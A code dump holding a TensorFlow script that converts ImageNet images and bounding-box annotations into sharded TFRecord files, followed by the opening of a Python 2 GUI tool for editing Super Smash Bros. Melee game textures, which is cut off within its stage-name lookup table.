image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [1, 1000] where 0 is not used.
image/class/synset: string specifying the unique ID of the label,
e.g. 'n01440764'
image/class/text: string specifying the human-readable version of the label
e.g. 'red fox, Vulpes vulpes'
image/object/bbox/xmin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/xmax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/label: integer specifying the index in a classification
layer. The label ranges from [1, 1000] where 0 is not used. Note this is
always identical to the image label.
Note that the length of xmin is identical to the length of xmax, ymin and ymax
for each example.
Running this script using 16 threads may take around ~2.5 hours on a HP Z420.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
tf.app.flags.DEFINE_string('train_directory', '/tmp/',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp/',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 1024,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 128,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 8,
'Number of threads to preprocess the images.')
# The labels file contains a list of valid labels are held in this file.
# Assumes that the file contains entries as such:
# n01440764
# n01443537
# n01484850
# where each line corresponds to a label expressed as a synset. We map
# each synset contained in the file to an integer (based on the alphabetical
# ordering). See below for details.
tf.app.flags.DEFINE_string('labels_file',
'imagenet_lsvrc_2015_synsets.txt',
'Labels file')
# This file containing mapping from synset to human-readable label.
# Assumes each line of the file looks like:
#
# n02119247 black fox
# n02119359 silver fox
# n02119477 red fox, Vulpes fulva
#
# where each line corresponds to a unique mapping. Note that each line is
# formatted as <synset>\t<human readable label>.
tf.app.flags.DEFINE_string('imagenet_metadata_file',
'imagenet_metadata.txt',
'ImageNet metadata file')
# This file is the output of process_bounding_box.py
# Assumes each line of the file looks like:
#
# n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
#
# where each line corresponds to one bounding box annotation associated
# with an image. Each line can be parsed as:
#
# <JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
#
# Note that there might exist mulitple bounding box annotations associated
# with an image file.
tf.app.flags.DEFINE_string('bounding_box_file',
'./imagenet_2012_bounding_boxes.csv',
'Bounding box file')
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _float_feature(value):
"""Wrapper for inserting float features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, synset, human, bbox,
height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
synset: string, unique WordNet ID specifying the label, e.g., 'n02323233'
human: string, human-readable label, e.g., 'red fox, Vulpes vulpes'
bbox: list of bounding boxes; each box is a list of integers
specifying [xmin, ymin, xmax, ymax]. All boxes are assumed to belong to
the same label as the image label.
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
xmin = []
ymin = []
xmax = []
ymax = []
for b in bbox:
assert len(b) == 4
# pylint: disable=expression-not-assigned
[l.append(point) for l, point in zip([xmin, ymin, xmax, ymax], b)]
# pylint: enable=expression-not-assigned
colorspace = 'RGB'
channels = 3
image_format = 'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(colorspace),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/synset': _bytes_feature(synset),
'image/class/text': _bytes_feature(human),
'image/object/bbox/xmin': _float_feature(xmin),
'image/object/bbox/xmax': _float_feature(xmax),
'image/object/bbox/ymin': _float_feature(ymin),
'image/object/bbox/ymax': _float_feature(ymax),
'image/object/bbox/label': _int64_feature([label] * len(xmin)),
'image/format': _bytes_feature(image_format),
'image/filename': _bytes_feature(os.path.basename(filename)),
'image/encoded': _bytes_feature(image_buffer)}))
return example
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that converts CMYK JPEG data to RGB JPEG data.
self._cmyk_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_jpeg(self._cmyk_data, channels=0)
self._cmyk_to_rgb = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def cmyk_to_rgb(self, image_data):
return self._sess.run(self._cmyk_to_rgb,
feed_dict={self._cmyk_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
# File list from:
# https://groups.google.com/forum/embed/?place=forum/torch7#!topic/torch7/fOSTXHIESSU
return 'n02105855_2933.JPEG' in filename
def _is_cmyk(filename):
"""Determine if file contains a CMYK JPEG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a JPEG encoded with CMYK color space.
"""
# File list from:
# https://github.com/cytsai/ilsvrc-cmyk-image-list
blacklist = ['n01739381_1309.JPEG', 'n02077923_14822.JPEG',
'n02447366_23489.JPEG', 'n02492035_15739.JPEG',
'n02747177_10752.JPEG', 'n03018349_4028.JPEG',
'n03062245_4620.JPEG', 'n03347037_9675.JPEG',
'n03467068_12171.JPEG', 'n03529860_11437.JPEG',
'n03544143_17228.JPEG', 'n03633091_5218.JPEG',
'n03710637_5125.JPEG', 'n03961711_5286.JPEG',
'n04033995_2932.JPEG', 'n04258138_17003.JPEG',
'n04264628_27969.JPEG', 'n04336792_7448.JPEG',
'n04371774_5854.JPEG', 'n04596742_4225.JPEG',
'n07583066_647.JPEG', 'n13037406_4650.JPEG']
return filename.split('/')[-1] in blacklist
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
image_data = tf.gfile.FastGFile(filename, 'r').read()
# Clean the dirty data.
if _is_png(filename):
# 1 image is a PNG.
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
elif _is_cmyk(filename):
# 22 JPEG images are in CMYK colorspace.
print('Converting CMYK to RGB for %s' % filename)
image_data = coder.cmyk_to_rgb(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
synsets, labels, humans, bboxes, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch to run index is within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in xrange(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
synset = synsets[i]
human = humans[i]
bbox = bboxes[i]
image_buffer, height, width = _process_image(filename, coder)
example = _convert_to_example(filename, image_buffer, label,
synset, human, bbox,
height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, synsets, labels, humans,
bboxes, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(synsets)
assert len(filenames) == len(labels)
assert len(filenames) == len(humans)
assert len(filenames) == len(bboxes)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(np.int)
ranges = []
threads = []
for i in xrange(len(spacing) - 1):
ranges.append([spacing[i], spacing[i+1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in xrange(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
synsets, labels, humans, bboxes, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the ImageNet data set resides in JPEG files located in
the following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
where 'n01440764' is the unique synset label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
n01440764
n01443537
n01484850
where each line corresponds to a label expressed as a synset. We map
each synset contained in the file to an integer (based on the alphabetical
ordering) starting with the integer 1 corresponding to the synset
contained in the first line.
The reason we start the integer labels at 1 is to reserve label 0 as an
unused background class.
Returns:
filenames: list of strings; each string is a path to an image file.
synsets: list of strings; each string is a unique WordNet ID.
labels: list of integer; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % data_dir)
challenge_synsets = [l.strip() for l in
tf.gfile.FastGFile(labels_file, 'r').readlines()]
labels = []
filenames = []
synsets = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for synset in challenge_synsets:
jpeg_file_path = '%s/%s/*.JPEG' % (data_dir, synset)
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
synsets.extend([synset] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
print('Finished finding files in %d of %d classes.' % (
label_index, len(challenge_synsets)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = range(len(filenames))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
synsets = [synsets[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(challenge_synsets), data_dir))
return filenames, synsets, labels
def _find_human_readable_labels(synsets, synset_to_human):
"""Build a list of human-readable labels.
Args:
synsets: list of strings; each string is a unique WordNet ID.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
Returns:
List of human-readable strings corresponding to each synset.
"""
humans = []
for s in synsets:
assert s in synset_to_human, ('Failed to find: %s' % s)
humans.append(synset_to_human[s])
return humans
def _find_image_bounding_boxes(filenames, image_to_bboxes):
"""Find the bounding boxes for a given image file.
Args:
filenames: list of strings; each string is a path to an image file.
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
Returns:
List of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
"""
num_image_bbox = 0
bboxes = []
for f in filenames:
basename = os.path.basename(f)
if basename in image_to_bboxes:
bboxes.append(image_to_bboxes[basename])
num_image_bbox += 1
else:
bboxes.append([])
print('Found %d images with bboxes out of %d images' % (
num_image_bbox, len(filenames)))
return bboxes
def _process_dataset(name, directory, num_shards, synset_to_human,
image_to_bboxes):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
"""
filenames, synsets, labels = _find_image_files(directory, FLAGS.labels_file)
humans = _find_human_readable_labels(synsets, synset_to_human)
bboxes = _find_image_bounding_boxes(filenames, image_to_bboxes)
_process_image_files(name, filenames, synsets, labels,
humans, bboxes, num_shards)
def _build_synset_lookup(imagenet_metadata_file):
"""Build lookup for synset to human-readable label.
Args:
imagenet_metadata_file: string, path to file containing mapping from
synset to human-readable label.
Assumes each line of the file looks like:
n02119247 black fox
n02119359 silver fox
n02119477 red fox, Vulpes fulva
where each line corresponds to a unique mapping. Note that each line is
formatted as <synset>\t<human readable label>.
Returns:
Dictionary of synset to human labels, such as:
'n02119022' --> 'red fox, Vulpes vulpes'
"""
lines = tf.gfile.FastGFile(imagenet_metadata_file, 'r').readlines()
synset_to_human = {}
for l in lines:
if l:
parts = l.strip().split('\t')
assert len(parts) == 2
synset = parts[0]
human = parts[1]
synset_to_human[synset] = human
return synset_to_human
def _build_bounding_box_lookup(bounding_box_file):
"""Build a lookup from image file to bounding boxes.
Args:
bounding_box_file: string, path to file with bounding boxes annotations.
Assumes each line of the file looks like:
n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
where each line corresponds to one bounding box annotation associated
with an image. Each line can be parsed as:
<JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
Note that there might exist mulitple bounding box annotations associated
with an image file. This file is the output of process_bounding_boxes.py.
Returns:
Dictionary mapping image file names to a list of bounding boxes. This list
contains 0+ bounding boxes.
"""
lines = tf.gfile.FastGFile(bounding_box_file, 'r').readlines()
images_to_bboxes = {}
num_bbox = 0
num_image = 0
for l in lines:
if l:
parts = l.split(',')
assert len(parts) == 5, ('Failed to parse: %s' % l)
filename = parts[0]
xmin = float(parts[1])
ymin = float(parts[2])
xmax = float(parts[3])
ymax = float(parts[4])
box = [xmin, ymin, xmax, ymax]
if filename not in images_to_bboxes:
images_to_bboxes[filename] = []
num_image += 1
images_to_bboxes[filename].append(box)
num_bbox += 1
print('Successfully read %d bounding boxes '
'across %d images.' % (num_bbox, num_image))
return images_to_bboxes
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Build a map from synset to human-readable label.
synset_to_human = _build_synset_lookup(FLAGS.imagenet_metadata_file)
image_to_bboxes = _build_bounding_box_lookup(FLAGS.bounding_box_file)
# Run it!
_process_dataset('validation', FLAGS.validation_directory,
FLAGS.validation_shards, synset_to_human, image_to_bboxes)
_process_dataset('train', FLAGS.train_directory, FLAGS.train_shards,
synset_to_human, image_to_bboxes)
if __name__ == '__main__':
tf.app.run()
|
DAT Texture Wizard.py | #!/usr/bin/python
# This file's encoding: UTF-8, so that non-ASCII characters can be used in strings.
# ------------------------------------------------------------------- #
# ~ ~ Written by DRGN of SmashBoards (Daniel R. Cappel) ~ ~ #
# - - - - [ Feb., 2015 ] - - - - #
# - - [ Python v2.7.12 and Tkinter 8.5 ] - - #
# --------------------------------------------------------------- #
programVersion = '6.1.2'
# Find the official thread here: http://smashboards.com/threads/new-tools-for-texture-hacking.373777/
# Primary logic
import os # Various file and folder operations
import io
import sys
import png # Only used for png.Reader(), for reading PNG files
import psutil # For checking running processes (checking whether temp files are in use)
import shutil # For file copying
import subprocess # Subprocess for communication with command line
import xxhash, array # Both used for generating texture file names using Dolphin's naming convention
import random, struct
import multiprocessing
import math, errno, tempfile
import hsdFiles, hsdStructures
from sets import Set
from threading import Thread
from binascii import hexlify, unhexlify # Convert from bytearrays to strings (and vice verca via unhexlify)
from string import hexdigits # For checking that a string only consists of hexadecimal characters
from datetime import datetime # For keeping track of the recently opened files.
from tplCodec import codecBase, tplDecoder, tplEncoder, missingType, noPalette
from collections import OrderedDict
# GUI dependencies
import time # Used for time.sleep() (for waits) and performance testing
import tkFont
import webbrowser # Used to open a web page.
import RenderEngine
import Tkinter as Tk
import ttk, tkMessageBox, tkFileDialog
from ctypes import c_ubyte # For image data memory management
from ScrolledText import ScrolledText
from tkColorChooser import askcolor
from PIL import Image, ImageOps, ImageTk, ImageDraw
from GuiSubComponents import (
getWindowGeometry,
basicWindow,
PopupEntryWindow,
CopyableMessageWindow,
DisguisedEntry,
VerticalScrolledFrame,
ToolTip,
HexEditEntry,
HexEditDropdown,
ImageDataLengthCalculator
)
try: from cStringIO import StringIO # Preferred for performance.
except: from StringIO import StringIO
# Extras for drag-and-drop and sound effects.
from sys import argv as programArgs # Access files given (drag-and-dropped) to the program icon.
from newTkDnD import TkDND # Access files given (drag-and-dropped) onto the running program GUI.
# Output errors to an error log, since the console likely won't be available
if programArgs[0][-4:] == '.exe': # If this code has been compiled....
sys.stderr = open( 'Error Log.txt', 'a' )
sys.stderr.write( '\n\n:: ' + str( datetime.today() ) + ' ::\n' )
# Load modules for hash generation
scriptHomeFolder = os.path.abspath( os.path.dirname(programArgs[0]) ) # Can't use __file__ after freeze
sys.path.append( scriptHomeFolder + '\\bin' ) # So we can use executables from there
# For performance testing
#import timeit
# User defined settings / persistent memory.
import ConfigParser
settings = ConfigParser.SafeConfigParser()
settings.optionxform = str # Tells the settings parser to preserve case sensitivity (for camelCase).
# Define some necessary file paths
imagesFolder = scriptHomeFolder + '\\imgs'
texDumpsFolder = scriptHomeFolder + "\\Texture dumps"
settingsFile = scriptHomeFolder + '\\settings.ini'
pathToPngquant = scriptHomeFolder + '\\bin\\pngquant.exe' # For palette generation
# Supplemental Necessities
wimgtPath = scriptHomeFolder + '\\bin\\wimgt\\wimgt.exe' # For encoding type _14 textures only
if not os.path.exists( wimgtPath ): # If wimgt isn't found in the above directory, fall back to assuming that wimgt is installed to the system.
wimgtPath = 'wimgt'
# Globals
globalDiscDetails = { #todo create a proper disc class
'isoFilePath': '',
'isMelee': '', # Will be '00' '01', '02', or 'pal' if the disc's DOL is a revision of Melee
'is20XX': '', # Empty if not 20XX; populated by the check20xxVersion function
'gameId': '',
'rebuildRequired': False
}
globalDatFile = None
globalBannerFile = None
scanningDat = False
stopAndScanNewDat = False
updatingBannerFileInfo = False
stopAndReloadBannerFileInfo = False
programClosing = False
unsavedDiscChanges = []
editedDatEntries = []
editedBannerEntries = []
# Values for live updating of settings while program is running.
generalBoolSettings = {}
imageFilters = {}
# Default settings for persisent memory (saved in settings.ini file)
generalSettingsDefaults = {
'defaultSearchDirectory': os.path.expanduser('~'),
'hexEditorPath': '',
'emulatorPath': '',
'maxFilesToRemember': '6',
'globalFontSize': '-13',
'paddingBetweenFiles': '0x40',
'downscalingFilter': 'lanczos', # all options: nearest, lanczos, bilinear, bicubic
'textureExportFormat': 'png',
'altFontColor': '#d1cede' # A shade of silver; useful for high-contrast system themes
} # Once initialized by loadSettings, these are referenced by settings.get( 'General Settings', [settingName] )
generalBoolSettingsDefaults = { # To add more options, simply add the key to here, and create an option in the main menus for it.
'dumpPNGs': '0',
'deleteImageDumpsOnExit': '1',
'autoUpdateHeaders': '1',
'backupOnRebuild': '1',
'showCanvasGrid': '1',
'showTextureBoundary': '0',
'avoidRebuildingIso': '1',
'regenInvalidPalettes': '0',
'useDiscConvenienceFolders': '1',
'autoGenerateCSPTrimColors': '0',
'cascadeMipmapChanges': '1',
'useDolphinNaming': '0',
'useAltFontColor': '0'
} # Once initialized by loadSettings, these are referenced by generalBoolSettings[setting].get()
imageFiltersDefaults = {
'widthFilter': '=|',
'heightFilter': '=|',
'aspectRatioFilter': '=|',
'imageTypeFilter': '=|',
'offsetFilter': '=|'
}
# Lookup tables:
imageFormats = { 0:'I4', 1:'I8', 2:'IA4', 3:'IA8', 4:'RGB565', 5:'RGB5A3', 6:'RGBA8', 8:'CI4', 9:'CI8', 10:'CI14x2', 14:'CMPR' }
userFriendlyFormatList = [ '_0 (I4)', '_1 (I8)', '_2 (IA4)', '_3 (IA8)', '_4 (RGB565)', '_5 (RGB5A3)', '_6 (RGBA8)', '_8 (CI4)', '_9 (CI8)', '_10 (CI14x2)', '_14 (CMPR)' ]
# SSBM Disc tree filename lookup.
audioNameLookup = { # .sem, .hps, and .ssm files
'opening': "The game's Opening Movie audio",
'smash2': 'Audio Scripts And Sound Effect Info',
'swm_15min': "'Special Movie 2' audio"
}
movieNameLookup = { # Video files only (.mth); no audio with these.
'MvHowto': 'The "How to Play" video',
'MvOmake15': 'The 15-Minute "Special Movie"',
'MvOpen': "The game's Opening Movie"
}
charNameLookup = {
'Bo': '[Boy] Male Wireframe',
'Ca': 'Captain Falcon',
'Ch': 'Crazy Hand',
'Cl': 'Young Link',
'Co': 'Common to the cast',
'Dk': 'Donkey Kong',
'Dr': 'Dr. Mario',
'Fc': 'Falco',
'Fe': 'Roy [Fire Emblem]',
'Fx': 'Fox',
'Gk': '[GigaKoopa] GigaBowser',
'Gl': '[Girl] Female Wireframe',
'Gn': 'Ganondorf',
'Gw': "Game 'n Watch",
'Ic': 'Ice Climbers',
'Kb': 'Kirby',
'Kp': 'Bowser [Koopa]',
'Lg': 'Luigi',
'Lk': 'Link',
'Mh': 'Master Hand',
'Mn': 'Menus Data',
'Mr': 'Mario',
'Ms': 'Marth [Mars]',
'Mt': 'Mewtwo',
'Nn': 'Ice Climbers [Nana]',
'Ns': 'Ness',
'Pc': 'Pichu',
'Pe': 'Peach',
'Pk': 'Pikachu',
'Pn': 'Ice Climbers [Popo/Nana] ',
'Pp': 'Ice Climbers [Popo]',
'Pr': 'Jigglypuff [Purin]',
'Sb': 'SandBag',
'Sk': 'Sheik',
'Ss': 'Samus',
'Wf': 'Wolf',
'Ys': 'Yoshi',
'Zd': 'Zelda'
}
charColorLookup = {
'Aq': 'aqua',
'Bk': 'black',
'Bu': 'blue',
'Gr': 'green',
'Gy': 'gray',
'La': 'lavender',
'Nr': 'neutral',
'Or': 'orange',
'Pi': 'pink',
'Rd': 'red', # Unique to 20XX 4.0+ for Falcon's .usd variation
'Re': 'red',
'Rl': 'red', # Unique to 20XX 4.0+ for Falcon's .usd variation (red 'L')
'Rr': 'red', # Unique to 20XX 4.0+ for Falcon's .usd variation (red 'R')
'Wh': 'white',
'Ye': 'yellow'
}
stageNameLookup = { # Keys should be 3 characters long.
'Bb.': 'Big Blue',
'Cn.': 'Corneria',
'Cs.': "Princess Peach's Castle",
'EF1': 'Goomba Trophy Stage',
'EF2': 'Entei Trophy Stage',
'EF3': 'Majora Trophy Stage',
'Fs.': 'Fourside',
'Fz.': 'Flat Zone',
'Gb.': 'Great Bay',
'Gd.': 'Kongo Jungle [Garden]',
'Gr.': 'Green Greens',
'He.': 'All-Star Rest Area [Heal]',
'Hr.': 'Homerun Contest',
'I1.': 'Mushroom Kingdom',
'I2.': 'Mushroom Kingdom II (Subcon)',
'TIc': 'Icetop (unused stage)',
'Im.': 'Icicle Mountain',
'Iz.': 'Fountain of Dreams [Izumi]',
'Kg.': 'Kongo Jungle',
'Kr.': 'Brinstar Depths [Kraid]',
'Mc.': 'Mute City',
'NBa': 'Battlefield',
'NBr': 'F-Zero Grand Prix',
'NFg': 'Trophy Collector [Figure Get]',
'NKr': 'Mushroom Kingdom Adventure',
'NLa': 'Final Destination',
'NPo': 'Pushon?',
'NSr': 'Hyrule Maze',
'NZr': 'Brinstar Escape Shaft [Zebes]',
'Ok.': 'Kongo Jungle (N64)',
'Op.': 'Dream Land (N64)',
'Ot.': 'Onett',
'Oy.': "Yoshi's Island (N64)",
'Ps.': 'Pokemon Stadium',
'Ps1': 'Pokemon Stadium - Fire Form',
'Ps2': 'Pokemon Stadium - Grass Form',
'Ps3': 'Pokemon Stadium - Water Form',
'Ps4': 'Pokemon Stadium - Rock Form',
'Pu.': 'Poke Floats [Pura]',
'Rc.': 'Rainbow Cruise',
'Sh.': 'Hyrule Temple [Shrine]',
'St.': "Yoshi's Story",
'Te.': '"TEST" (a.k.a. The Coffee Shop)',
'Ve.': 'Venom',
'Yt.': "Yoshi's Island",
'Ze.': 'Brinstar [Zebes]'
}
onePlayerStages = ( 'EF1', 'EF2', 'EF3', 'He.', 'Hr.', 'NBr', 'NFg', 'NKr', 'NSr', 'NZr', 'Te.' )
specialStagesIn20XX = { # Key = file name string beginning after 'Gr'
'C0.usd': 'Sector Z', # 20XXHP 5.0+
'Cs.0at': "Omega Peach's Castle", # 20XXHP 5.0+
'Fs.1at': 'Smashville Fourside',
'Fs.2at': 'Moonside', # 20XXHP 5.0+
'Gb.0at': 'Turtle Stage', # 20XXHP 5.0+
'Gb.1at': 'Great Bay, Beach', # 20XXHP 5.0+
'Gb.hat': 'Great Bay, Hacked',
'Gd.1at': 'Jungle Japes, Hacked (w/platform)',
'Gd.2at': 'Jungle Japes, Omega',
'Gr.1at': 'Green Greens, Hacked',
'He.0at': 'Walk-Off Heal', # 20XXHP 5.0+
'I1.0at': "Milun's Mushroom Kingdom", # 20XXHP 5.0+
'I1.1at': "Porygon", # 20XXHP 5.0+
'I1.2at': "Shiny Porygon", # 20XXHP 5.0+
'Iz.gat': 'Cave of Dreams', # 20XXHP 5.0+
'Kg.hat': 'Kongo Jungle, Hacked',
'NBa.2at': 'Ancient Battlefield',
'NBa.3at': 'Battlefield Plaza',
'NBa.4at': 'Matrix Battlefield', # Old 20XX
'NBa.bat': 'Battlefield Plaza',
'NBa.gat': 'Brawl Battlefield - Day', # 20XXHP 5.0+
'NBa.hat': 'Brawl Battlefield - Day (w/Castle)', # 20XXHP 5.0+
'NBa.iat': 'Brawl Battlefield - Void', # 20XXHP 5.0+
'NBa.lat': 'Brawl Battlefield',
'NFg.0at': 'Trophy Collector (Two platforms)',
'NFg.1at': 'Trophy Collector (Three platforms)',
'NFg.2at': 'Trophy Collector, Omega',
'NKr.1at': 'Mushroom Kingdom Adventure, Hacked',
'NKr.2at': 'Mushroom Kingdom Adventure, Omega',
'NLa.0at': 'Final Destination',
'NLa.2at': 'Wii-U Final Destination', # Old 20XX
'NLa.gat': 'Wii-U Final Destination', # 20XXHP 5.0+
'NLa.hat': 'zankyou FD', # 20XXHP 5.0+
'NSr.1at': 'Hyrule Maze, Hacked',
'Ok.0at': 'Monster Island', # 20XXHP 5.0+
'Op.gat': 'Halberd Land', # 20XXHP 5.0+
'Op.kat': 'KirbyWare, Inc.',
'Op.rat': 'Return to Dream Land',
'Oy.hat': "Yoshi's Island (N64), Milun Hack",
'Oy.wat': 'WarioWare, Inc.',
'Pb.usd': 'Pokemon Stadium (Blue, No transforms)', # Old 20XX
'Pg.usd': 'Indigo Stadium', # 20XXHP 5.0+
'Pn.usd': 'Pokemon Stadium (Blue, No transforms)', # 20XXHP 5.0+
'Sh.sat': 'Skyrule (Redux)',
'Sh.0at': "Dark Temple", # 20XXHP 5.0+
'St.gat': "Peach's Story", # 20XXHP 5.0+
